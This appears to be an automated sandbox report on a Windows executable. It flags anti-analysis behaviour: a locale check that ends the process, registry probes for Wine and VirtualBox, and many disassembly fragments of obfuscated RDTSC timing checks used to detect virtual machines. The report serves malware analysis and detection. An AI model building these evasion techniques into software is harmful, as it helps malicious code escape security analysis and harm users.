                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C99BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37858
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F063D second address: 10F064D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0DECD24168h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F07A1 second address: 10F07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F07A7 second address: 10F07C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0DECD2416Ch 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F0DECD24166h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F07C4 second address: 10F07C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F07C9 second address: 10F07D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0DECD24166h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F07D5 second address: 10F07DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F07DB second address: 10F07EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0DECD2416Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F07EC second address: 10F0800 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DED622D76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F094E second address: 10F095A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0DECD24166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F095A second address: 10F0977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D86h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0C08 second address: 10F0C1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0DC0 second address: 10F0DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D80h 0x00000007 jmp 00007F0DED622D85h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F0DED622D76h 0x00000017 ja 00007F0DED622D76h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0DFA second address: 10F0DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0DFF second address: 10F0E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E09 second address: 10F0E13 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0DECD24166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E13 second address: 10F0E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F34EC second address: 10F355B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DECD24173h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F0DECD2416Fh 0x00000013 nop 0x00000014 push esi 0x00000015 mov dword ptr [ebp+122D1C96h], edx 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e sub dword ptr [ebp+122D1C5Bh], edi 0x00000024 jnl 00007F0DECD2416Bh 0x0000002a add di, 5B91h 0x0000002f call 00007F0DECD24169h 0x00000034 jmp 00007F0DECD2416Ah 0x00000039 push eax 0x0000003a ja 00007F0DECD2416Ah 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 push eax 0x00000048 pop eax 0x00000049 pop edi 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F355B second address: 10F356B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ebx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F356B second address: 10F357E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F0DECD24166h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F362C second address: 10F3631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3808 second address: 10F3824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F0DECD24173h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3824 second address: 10F385A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0DED622D78h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ch, 3Dh 0x00000027 push 2A826010h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push edx 0x00000031 pop edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F385A second address: 10F3864 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3864 second address: 10F3906 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 2A826090h 0x0000000f mov ecx, dword ptr [ebp+122D35E7h] 0x00000015 push 00000003h 0x00000017 sbb di, 0765h 0x0000001c push 00000000h 0x0000001e jmp 00007F0DED622D7Ah 0x00000023 jmp 00007F0DED622D7Ah 0x00000028 push 00000003h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F0DED622D78h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 push edx 0x00000045 mov edx, dword ptr [ebp+122D19CDh] 0x0000004b pop edi 0x0000004c call 00007F0DED622D79h 0x00000051 jmp 00007F0DED622D7Ah 0x00000056 push eax 0x00000057 jmp 00007F0DED622D7Ah 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 jmp 00007F0DED622D84h 0x00000065 mov eax, dword ptr [eax] 0x00000067 push eax 0x00000068 push edx 0x00000069 push ecx 0x0000006a jc 00007F0DED622D76h 0x00000070 pop ecx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3906 second address: 10F390C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F390C second address: 10F3975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F0DED622D7Fh 0x00000014 pop eax 0x00000015 sub dword ptr [ebp+122DB2FEh], ebx 0x0000001b lea ebx, dword ptr [ebp+124593D5h] 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F0DED622D78h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b adc edx, 102DE336h 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11121CF second address: 11121D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11121D8 second address: 11121DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112653 second address: 111265D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0DECD24166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111265D second address: 1112663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112663 second address: 1112669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112669 second address: 1112673 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0DED622D7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112C25 second address: 1112C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24174h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112F4B second address: 1112F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108746 second address: 110874C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110874C second address: 1108759 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113AA8 second address: 1113AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113AB1 second address: 1113AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D84h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0DED622D7Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113AD8 second address: 1113AE2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0DECD24166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113D79 second address: 1113D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Fh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116F85 second address: 1116F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0DECD24166h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116048 second address: 111604F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111604F second address: 1116054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A3A1 second address: 111A3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A3A5 second address: 111A3AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EE88 second address: 111EE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EE8D second address: 111EEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DECD24177h 0x00000008 jg 00007F0DECD24166h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DDDB9 second address: 10DDDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E25F second address: 111E294 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0DECD2416Dh 0x0000000f jmp 00007F0DECD24170h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e push edx 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E294 second address: 111E29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E29D second address: 111E2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E2A1 second address: 111E2BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0DED622D76h 0x00000008 jmp 00007F0DED622D81h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E2BC second address: 111E2C6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0DECD24172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E2C6 second address: 111E2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E2CC second address: 111E2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F0DECD24166h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E48F second address: 111E493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E493 second address: 111E499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E72C second address: 111E732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E732 second address: 111E749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F0DECD24172h 0x0000000b jmp 00007F0DECD2416Ah 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E749 second address: 111E74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E74F second address: 111E753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E9DE second address: 111EA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0DED622D7Eh 0x00000010 jmp 00007F0DED622D7Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EA04 second address: 111EA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EA15 second address: 111EA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EA1F second address: 111EA43 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0DECD24176h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F0DECD2416Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EA43 second address: 111EA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnl 00007F0DED622D78h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11204E1 second address: 11204E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120611 second address: 1120616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120616 second address: 1120642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DECD24173h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11207CE second address: 11207D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11207D3 second address: 11207FA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0DECD2417Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1121033 second address: 1121045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1121045 second address: 1121060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112131F second address: 112133C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F0DED622D8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DED622D7Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11215BC second address: 11215C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11215C0 second address: 11215C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11215C4 second address: 11215CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11215CA second address: 112160E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0DED622D78h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 call 00007F0DED622D7Fh 0x0000002a mov edi, dword ptr [ebp+122D27A7h] 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112160E second address: 1121614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126EC1 second address: 1126EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Fh 0x00000009 pop eax 0x0000000a jmp 00007F0DED622D89h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126EF1 second address: 1126F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0DECD24166h 0x0000000a jmp 00007F0DECD24170h 0x0000000f popad 0x00000010 jnl 00007F0DECD2416Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007F0DECD24166h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126F27 second address: 1126F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D7Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E2D1B second address: 10E2D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E2D25 second address: 10E2D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112755B second address: 1127565 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0DECD2416Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
